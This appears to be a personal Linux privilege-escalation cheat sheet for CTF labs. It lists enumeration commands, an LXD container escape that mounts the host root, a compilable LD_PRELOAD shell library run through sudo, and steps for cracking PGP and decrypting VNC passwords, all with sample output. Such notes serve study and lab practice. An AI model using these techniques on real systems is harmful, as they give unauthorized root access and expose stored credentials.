Linux

I LOVE DOING THIS :)

• Check for the sudo permissions for that current user using sudo -l

• Check the /etc/os-release* and the groups which the user belongs to using the id command - Also do check the env

cat /etc/issue
cat /etc/*-release
cat /proc/version
uname -a
arch
ldd --verion
grep -Hs iptables /etc/*        # Firewall Enumeration
lsmod
/sbin/modinfo <mod name>        # Kernel Modules

File Owners and Permissions

ls -la
find . -ls
history
cat ~/.bash_history
find / -type f -user <username> -readable 2> /dev/null # Readable files for user
find / -writable -type d 2>/dev/null # Writable files by the user
find /usr/local/ -type d -writable

Cron Jobs

ls -lah /etc/cron*
cat /etc/crontab
ls -la /var/log/cron*               
find / -name cronlog 2>/dev/null
grep "CRON" /var/log/cron.log   
grep CRON /var/log/syslog       

Internally running ports

Netstat -alnp | grep LIST | grep port_num
Netstat -antp
netstat -tulnp
curl the listening ports

Interesting directories to check using the ls -la command

/dev 
/scripts 
/opt 
/mnt 
/var/www/html 
/var/www/html/wordpress 
/var 
/etc 
/media
/backup

SUID Binaries - GTFObins

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
find / -perm -u=s -type f 2>/dev/null
find / -perm -4000 -user root 2>/dev/null
find / -type f -name <file name> 2>/dev/null
ldd /usr/bin/binary-name
strace /usr/local/bin/fishybinary 2>&1 | grep -iE "open|access|no such file"
ltrace /usr/sbin/binary-name

LXD Privilege Escalation

• When you know your a part of the lxd groups, then !

# Steps to be performed on the attacker machine:

Download build-alpine in your local machine through the git repository.
Execute the script “build -alpine” that will build the latest Alpine image as a compressed file, this step must be executed by the root user.
Transfer the tar file to the victim machine

• git clone https://github.com/saghul/lxd-alpine-builder.git

• cd lxd-alpine-builder

• bash build-alpine

# Steps to be performed on the victim machine:

Download the alpine image
Import image for lxd 
Initialize the image inside a new container.
Mount the container inside the /root directory

• lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage

• lxc image list

• lxc init myimage ignite -c security.privileged=true

It now initializes a new Linux container named "ignite" using the image "myimage", with the security configuration option "security.privileged" set to "true"

This means the container will have elevated privileges, allowing it to access resources that would otherwise be restricted

• lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

And then adds a new device called "mydevice" to the Linux container named "ignite"

The device is a disk type with a source of "/" (root directory of the host file system) and a path of "/mnt/root" in the container's file system

The "recursive=true" option means that the device will be added recursively, including all subdirectories

• lxc start ignite

• lxc exec ignite /bin/sh - We get R00t :)

Found a .git directory ?

• Dump the commit history

• Check the logs for any passwords

• Refer Githappens THM Box :)

Pretty Good Privacy (PGP) ?

• Found any credentials or any file which has the extension .pgp

• If it fails then look for another .asc file and import it using the gpg command

$ gpg --decrypt credentials.pgp
FAILED
$ gpg --import tryhackme.asc 
passphrase : 

Confirms that the password is stored in the .asc file

• Crack it using gpg2john, import it again and decrypt it with the correct passphrase

• Refer this machine

LD Preload

• LD_PRELOAD is a function that allows any program to use shared libraries(.so) - It pre_loads the .so files to the actual binary before even the program is executed during the run-time, refer this machine :)

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() 
{
 unsetenv("LD_PRELOAD");
 setgid(0);
 setuid(0);
 system("/bin/bash");
}

Important => Unset the env variable "LD_PRELOAD", or it'll execute in an endless loop

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

$ sudo LD_PRELOAD=/home/user/shell.so /usr/bin/sky_backup_utility
# whoami
root

VNC process being run as ROOT

charix@Poison:~ % ps -auxww | grep vnc
root    529   0.0  0.7  23620 7432 v0- I    Fri23      0:00.04 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1

VNC is a remote access software just like TeamViewer or AnyDesk - The -rfbport flag tells us that it’s listening on port 5901 on localhost - We can verify that using the netstat command

charix@Poison:~ % netstat -an | grep LIST
tcp4       0      0 127.0.0.1.25           *.*                    LISTEN
tcp4       0      0 *.80                   *.*                    LISTEN
tcp6       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
tcp6       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 127.0.0.1.5801         *.*                    LISTEN
tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN

After some port forwarding !

vncviewer 127.0.0.1:5000
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Password:

When setting a VNC password, the password is obfuscated and saved as a file on the server. Instead of directly entering the password, the obfuscated password file can be included using the passwd option

GitHub - trinitronx/vncpasswd.py: A Python implementation of vncpasswd, w/decryption abilities & extra features ;-)GitHub

$ python vncpasswd.py -d -f ../../htb/poison/secret
Cannot read from Windows Registry on a Linux system
Cannot write to Windows Registry on a Linux system
Decrypted Bin Pass= 'VNCP@$$!'
Decrypted Hex Pass= '564e435040242421'